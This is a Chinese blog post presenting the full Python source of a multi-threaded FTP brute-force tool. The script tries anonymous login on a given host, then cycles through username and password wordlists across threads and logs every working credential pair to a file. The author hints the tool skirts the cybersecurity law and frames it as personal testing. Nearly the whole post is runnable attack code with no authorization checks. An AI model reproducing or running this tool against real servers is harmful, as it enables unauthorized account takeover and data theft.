A-A+

python FTP多线程暴力破解工具 最新优化版

2017年03月14日 16:30 学习笔记 暂无评论 阅读 1,513 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

就不对外公开了,毕竟新的网络安全法已经上了,你懂的。自己用作测试的。花了近2个小时弄的。特别完善多线程这块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import optparse
import ftplib, socket
import queue
import sys, os, time, re
 
 
def brute_anony(host):
    try:
        print('[+] 测试匿名登陆……\n')
        ftp = ftplib.FTP()
        ftp.connect(host, 21, timeout=10)
        print('FTP消息: %s \n' % ftp.getwelcome())
        ftp.login()
        ftp.retrlines('LIST')
        ftp.quit()
        f = open('successful.txt', 'a')
        f.write(str('successful---Host:%s\n' % (host)))
        f.close()
        print('\n[+] 匿名登陆成功……\n')
    except ftplib.all_errors:
        print('\n[-] 匿名登陆失败……\n')
 
 
class bcolors:
    OKBLUE = '\033[94m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
 
 
def logo():
    print('''        |---------------------------------------------------------------|
        |                                                               |
        |            QQ: 411161555  blog: https://woj.app               |
        |            2019-04-26 ftpbaopo.py                             |
        |            FTP Brute Forcing Tool                             |
        |                                                               |
        |---------------------------------------------------------------|
    ''')
 
 
class FtpBurp(threading.Thread):
    """docstring for ftp"""
 
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
 
    def run(self):
        while True:
            if self.queue.empty():
                break
            user, pwd, host = self.queue.get()
            try:
                ftp = ftplib.FTP()
                ftp.connect(host, 21, timeout=10)
                ftp.login(user, pwd)
                ftp.quit()
                ftxt = open('successful.txt', 'a')
                ftxt.write(str('successful---Host:%s --use)rname:%s --password:%s\n' % (host, user, pwd)))
                ftxt.close()
                print(bcolors.OKBLUE + '[!]successful---username:%s --password:%s' % (user, pwd))
            except ftplib.all_errors:
                print(bcolors.FAIL + '[*]' + user + '----' + pwd + '')
            self.queue.task_done()
 
 
if __name__ == '__main__':
    logo()
    parser = optparse.OptionParser(usage='%prog -H -u -p -T')
    parser.add_option('-H', '--host', dest='host', type='string',
                      help='specify target host= xxx.xxx.xxx.xx or www.xxx.com')
    parser.add_option('-u', '--userfile', dest='userfile', type='string', help='specify username\'filepath')
    parser.add_option('-p', '--passwordfile', dest='passfile', type='string', help='specify password\'filepath')
    parser.add_option('-T', '--thread', dest='threadnum', type='int', help='specity the number of thread -- default(6)')
    (options, args) = parser.parse_args()
    start_time = time.time()
    if options.threadnum:
        n = int(options.threadnum)
    else:
        n = 6
    host = options.host
    if options.host == None:
        parser.print_help()
        sys.exit(0)
 
    ####userlist = [i.rstrip() for i in open(options.userfile)]
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', options.host):
        host = options.host
    else:
        if options.host.find('/') >= 0:
            host = options.host.replace("http://", "")
            host = host.replace("https://", "")
            hostt = host.find(r'/')
            if hostt >= 0: host = host[:hostt]
        host = socket.gethostbyname(host)
    userlist = [i.strip() for i in open(options.userfile)]
    passlist = [j.strip() for j in open(options.passfile)]
    print('目  标:%s ' % host)
    print('用户名:%d 条' % len(userlist))
    print('密  码:%d 条' % len(passlist))
    print('线  程:%d 条' % n)
    brute_anony(host)
    print('\n[+] 暴力破解测试中……\n')
    threads = []
    queue = queue.Queue()
    lock = threading.Lock()
    ####num=threading.Semaphore(n)
    for user in userlist:
        for pwd in passlist:
            remodle = re.compile(r'%username%')
            if remodle.findall(pwd):
                pwd = pwd.replace("%username%", user)
            queue.put((user, pwd, host))
    for i in range(n):
        m_ftp = FtpBurp(queue)
        m_ftp.setDaemon(True)
        ####threads.append(m_ftp)
        m_ftp.start()
    # for m_ftp in threads:
    #     m_ftp.join()
    queue.join()
    print('所有执行完毕')

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×
标签:

给我留言